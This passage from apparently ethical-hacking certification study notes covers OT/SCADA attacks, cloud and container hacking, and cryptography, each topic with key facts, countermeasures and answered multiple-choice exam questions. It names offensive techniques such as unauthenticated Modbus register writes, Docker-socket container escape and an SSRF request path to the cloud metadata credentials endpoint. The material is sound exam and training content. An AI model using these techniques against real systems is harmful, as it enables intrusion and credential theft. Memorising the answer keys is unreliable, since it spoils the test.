        Reconnaissance: discover OT devices with Shodan, Google dorks (e.g., “PLC”).

        Scanning: Modbus/TCP scan with Nmap scripts (modbus-discover).

        Exploitation: weak authentication, default credentials on HMIs/PLCs, or protocol vulnerabilities.

        Tools: Metasploit modules (SCADA), ModbusPal (simulator), PLCscan.

        Lateral movement: from IT to OT via dual-homed hosts.

    Exam trap: Tools like PLCscan can read/write Modbus registers without authentication on many devices.

    MCQ: An attacker uses Nmap script modbus-discover and gets device ID and coil status. This indicates:
    A) Modbus service is running and accessible without authentication, B) DNS service, C) HTTP server, D) SNMP enabled.
    Correct: A

Topic: OT Attack Countermeasures

    5 must-know facts:

        Network segmentation with firewalls and DMZ between IT and OT.

        Disable unused services on PLCs and HMIs, enforce authentication.

        Use application whitelisting and change control on OT systems.

        Monitor OT network for anomalies (e.g., unexpected Modbus write commands).

        Regular vulnerability assessments and patch management (in scheduled maintenance).

    Exam trap: The Purdue model recommends that OT devices should not directly connect to the internet; all communications should pass through a secure DMZ.

    MCQ: According to best practices, where should a SCADA server be placed to protect it from internet attacks?
    A) Directly on the internet, B) In the OT network, behind a firewall with a DMZ, C) On the same subnet as guest Wi-Fi, D) In the cloud without firewall.
    Correct: B

Domain 8: Cloud Computing
Sub-Domain: Cloud Computing

Topic: Cloud Computing Concepts

    5 must-know facts:

        Service models: IaaS (VM), PaaS (platform), SaaS (software). Responsibility shared.

        Deployment models: Public, Private, Hybrid, Community.

        Essential characteristics: on-demand self-service, broad network access, resource pooling, rapid elasticity, measured service.

        Cloud security relies on shared responsibility model: provider secures infrastructure, customer secures data/app.

        Virtualization enables multi-tenancy; hypervisor creates VMs.

    Exam trap: In IaaS, customer is responsible for OS and application security; in SaaS, provider secures most, but customer manages data and user access.

    MCQ: In which cloud service model does the customer manage the operating system and applications?
    A) SaaS, B) IaaS, C) PaaS, D) None.
    Correct: B

Topic: Container Technology

    5 must-know facts:

        Containers package applications with dependencies, share host OS kernel, lighter than VMs.

        Docker is the most popular; images from Dockerfile; docker run to launch.

        Orchestration with Kubernetes: manages container clusters, pods, services.

        Security risks: image vulnerabilities, misconfigured exposed APIs, privilege escalation.

        Containers run in isolated namespaces and cgroups; escape is a major attack.

    Exam trap: A container escape attack allows the attacker to break out of the container and access the host OS. Docker socket /var/run/docker.sock exposure is dangerous.

    MCQ: An attacker compromises a container and finds that /var/run/docker.sock is mounted. This can allow:
    A) Container escape and host compromise, B) DDoS, C) SQL injection, D) XSS.
    Correct: A

Topic: Serverless Computing

    5 must-know facts:

        Function-as-a-Service (FaaS); AWS Lambda, Azure Functions. Code runs in stateless containers.

        No server provisioning; auto-scales. Billed per execution.

        Security concerns: event injection, insecure dependencies, overly permissive roles, and data exposure.

        Attacks: function event data tampering, denial of wallet (cost), and insecure storage.

        Logging and monitoring is crucial because traditional network security controls don't apply.

    Exam trap: Serverless functions can be triggered by cloud events (S3 bucket upload); if input not validated, attacker can inject malicious payload.

    MCQ: A serverless function is triggered by an HTTP request and processes user-supplied data without sanitization, leading to code execution. This is:
    A) SQL injection, B) Injection vulnerability in serverless function, C) XSS, D) ARP spoofing.
    Correct: B

Topic: Cloud Computing Threats

    5 must-know facts:

        Data breach: due to misconfigured storage buckets (S3, Blob).

        Insecure APIs: weak authentication, excessive permissions.

        Account hijacking: phishing cloud credentials.

        Insider threats: cloud admins abuse privileges.

        Denial of Service: resource exhaustion, cost inflation.

    Exam trap: Misconfigured AWS S3 bucket with public read/write is a common cause of data leaks. The exam may ask about the shared responsibility model.

    MCQ: A company's AWS S3 bucket containing customer PII is set to "public" for read access. This is:
    A) A DDoS attack, B) A security misconfiguration, C) Phishing, D) Malware.
    Correct: B

Topic: Cloud Hacking

    5 must-know facts:

        Exploiting misconfigured cloud resources using tools like ScoutSuite, Prowler, Pacu.

        Credential harvesting via phishing or metadata service (AWS instance metadata at 169.254.169.254).

        SSRF attacks on internal cloud metadata endpoints can retrieve IAM credentials.

        Container breakout and lateral movement in Kubernetes.

        Tools: Pacu (AWS exploitation framework), kube-hunter for Kubernetes.

    Exam trap: The instance metadata endpoint (169.254.169.254) provides temporary credentials to the instance; if a web app is vulnerable to SSRF, attacker can steal those credentials.

    MCQ: An attacker exploits an SSRF vulnerability in a web app to request http://169.254.169.254/latest/meta-data/iam/security-credentials/ and obtains AWS keys. This attack targets:
    A) SQL server, B) Cloud instance metadata service, C) DNS, D) SMTP.
    Correct: B

Topic: Cloud Security

    5 must-know facts:

        Identity and Access Management (IAM): least privilege, MFA, rotate keys.

        Encryption: at rest and in transit, using KMS/HSM.

        Network security: security groups, NACLs, VPC segmentation.

        Logging and monitoring: CloudTrail, GuardDuty.

        Compliance: follow standards like ISO 27001, CSA STAR.

    Exam trap: Cloud security responsibility depends on service model. Also, always validate that storage buckets are not publicly accessible.

    MCQ: To prevent unauthorized access to AWS resources, which practice is essential?
    A) Enable public access, B) Use IAM policies with least privilege and enable MFA, C) Use default VPC, D) Share root credentials.
    Correct: B

Domain 9: Cryptography
Sub-Domain: Cryptography

Topic: Cryptography Concepts

    Core Concept: Cryptography secures data confidentiality, integrity, authentication, and non-repudiation. Symmetric encryption uses one key; asymmetric uses key pairs. Hashes verify integrity. Attackers target weak algorithms or implementations.

    Key Tools: OpenSSL: openssl enc -aes-256-cbc -in file. GPG: gpg -c file. Hash: sha256sum.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Symmetric is fast for bulk data; asymmetric is used for key exchange and digital signatures. EC-Council expects you to know the difference between a stream cipher and a block cipher.

    Countermeasure: Use strong, modern algorithms (AES, RSA 2048+), keep keys secret, use proper key management.

    MCQ: Which type of encryption algorithm uses the same key for both encryption and decryption?
    A) Asymmetric, B) Hashing, C) Symmetric, D) Digital signature.
    Correct: C – Symmetric uses a shared secret. (A uses public/private; B one-way; D not encryption.)

Topic: Encryption Algorithms

    Core Concept: Symmetric: DES (obsolete), 3DES (legacy), AES (gold standard). Asymmetric: RSA, ECC, Diffie-Hellman (key exchange), ElGamal. Hash: MD5 (broken), SHA-1 (deprecated), SHA-256/512. RC4, Blowfish also appear.

    Key Tools: OpenSSL for algorithm operations. openssl speed for benchmarks.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: DES has 56-bit key, AES supports 128/192/256. RSA key length 2048+. Diffie-Hellman is key agreement, not encryption. EC-Council will trick by asking about algorithm strengths.

    Countermeasure: Disable legacy algorithms (DES, MD5, RC4) in configurations.

    MCQ: An organization needs to exchange a session key securely over an insecure channel. Which algorithm is designed for this?
    A) AES, B) Diffie-Hellman, C) SHA-256, D) Base64.
    Correct: B – Diffie-Hellman allows secure key exchange. (A symmetric encryption, not exchange; C hashing; D encoding.)

Topic: Cryptography Tools

    Core Concept: Tools implement cryptographic operations. OpenSSL is multi-purpose; GPG/PGP for email/file encryption; VeraCrypt for disk; Hashcat for cracking; Bcrypt for password hashing.

    Key Tools: OpenSSL: openssl req -new -x509 -keyout key.pem (generate cert). GPG: gpg --gen-key. Cryptool: educational. Hashcalc: calculate hashes.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: EC-Council might ask which tool is used for specific tasks: VeraCrypt for full disk encryption, PGP for email, OpenSSL for SSL/TLS certs.

    Countermeasure: Use these tools to encrypt data at rest and in transit, and manage certificates.

    MCQ: A security analyst needs to create a self-signed certificate for a web server. Which command-line tool would they likely use?
    A) John the Ripper, B) OpenSSL, C) Wireshark, D) Nmap.
    Correct: B – OpenSSL can generate X.509 certs. (A cracks passwords; C sniffs; D scans.)

Topic: Public Key Infrastructure (PKI)

    Core Concept: PKI manages digital certificates using a Certificate Authority (CA). Components: CA, Registration Authority (RA), certificate repository. X.509 standard. Used for SSL/TLS, code signing.

    Key Tools: OpenSSL (CA creation), Microsoft CA, certutil, keytool (Java).

    Critical Port Numbers/Protocols: LDAP 389, HTTP 80 for CRL distribution.

    Exam Trap: The CA issues the certificate; RA verifies identity. Certificate revocation is done via CRL (list) or OCSP (real-time). If the CA is compromised, all its certs are suspect.

    Countermeasure: Protect private key of CA, use offline root CA, monitor for unauthorized certs.

    MCQ: A browser needs to check if a website's certificate has been revoked. Which protocol provides real-time status?
    A) CRL, B) OCSP, C) DHCP, D) DNS.
    Correct: B – OCSP provides online certificate status. (A is a list, not real-time; C/D unrelated.)

Topic: Email Encryption

    Core Concept: Encrypting email ensures confidentiality (only recipient can read) and integrity. PGP and S/MIME are standards. PGP uses web of trust, S/MIME uses hierarchical CA.

    Key Tools: PGP/GnuPG (gpg --encrypt --recipient user@example.com file). S/MIME built into email clients. Mailvelope (browser).

    Critical Port Numbers/Protocols: SMTP 25/587, IMAP 143, POP3 110.

    Exam Trap: PGP uses a combination of symmetric (session key) and asymmetric (key exchange). PGP uses IDEA or AES for symmetric; RSA for public key. S/MIME uses X.509 certs. EC-Council may ask about the difference.

    Countermeasure: Use email encryption for sensitive data, enforce policies.

    MCQ: Which email encryption protocol uses a distributed trust model (web of trust) instead of a central CA?
    A) S/MIME, B) PGP, C) SSL/TLS, D) IPsec.
    Correct: B – PGP uses web of trust. (A uses CA; C transport; D network.)

Topic: Disk Encryption

    Core Concept: Full disk encryption (FDE) protects data at rest. If a device is lost, data remains unreadable without key. Tools: BitLocker (Windows), FileVault (macOS), LUKS (Linux), VeraCrypt.

    Key Tools: BitLocker: manage-bde -on C:. VeraCrypt: create encrypted volume. LUKS: cryptsetup luksFormat /dev/sda1.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: TPM (Trusted Platform Module) stores BitLocker keys securely. Without TPM, a USB key or PIN is needed. EC-Council may ask about cold boot attacks against disk encryption.

    Countermeasure: Use strong passphrases, enable Secure Boot, combine TPM with PIN.

    MCQ: A laptop with BitLocker enabled is stolen. What prevents the thief from accessing the data?
    A) Strong Windows password, B) The disk is encrypted and requires the decryption key, C) BIOS password, D) Antivirus.
    Correct: B – Full disk encryption secures data even if OS password is bypassed. (A is OS level; C can be reset; D not.)

Topic: Cryptanalysis

    Core Concept: Cryptanalysis is the study of breaking cryptographic systems. Methods: brute-force, ciphertext-only, known-plaintext, chosen-plaintext, man-in-the-middle, side-channel, birthday attack on hashes.

    Key Tools: Hashcat (brute-force), John the Ripper. Cryptool for analysis. Wireshark for traffic analysis.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Birthday attack exploits collision probability in hash functions (related to 2^(n/2) for n-bit hash). Side-channel attacks measure physical info (power, timing). EC-Council may ask which attack is against hash collisions: birthday.

    Countermeasure: Use long keys, strong algorithms, avoid vulnerable implementations, use constant-time operations.

    MCQ: An attacker intercepts encrypted messages and also knows some plaintext portions (e.g., header). They use this to derive the key. What type of attack?
    A) Brute-force, B) Known-plaintext, C) Chosen-ciphertext, D) Replay.
    Correct: B – Known-plaintext uses known pairs to break encryption. (A tries all keys; C attacker selects ciphertext; D resends.)

Topic: Cryptography Attack Countermeasures

    Core Concept: Use strong, standard algorithms; keep keys private; use key rotation; employ proper PKI; implement salt for password hashing; use authenticated encryption; and use TLS 1.3 for communications.

    Key Tools: Configure server to disable weak ciphers (e.g., Apache SSLCipherSuite), HSTS, certificate pinning. Hash passwords with bcrypt/scrypt/PBKDF2.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Salting prevents rainbow table attacks by adding random data to each password hash. Countermeasure against MitM on TLS is certificate pinning.

    Countermeasure: (This is the countermeasure) Regular security audits and compliance with standards like PCI DSS (strong encryption).

    MCQ: To defend against rainbow table attacks on password databases, what should be used?
    A) Strong encryption, B) A unique salt per password, C) Long passwords, D) MD5 hashing.
    Correct: B – Salting makes precomputed tables ineffective. (A not for hashing; C helpful but salt is primary; D weak.)

This completes all domains of the CEH v5.0 study notes bundle.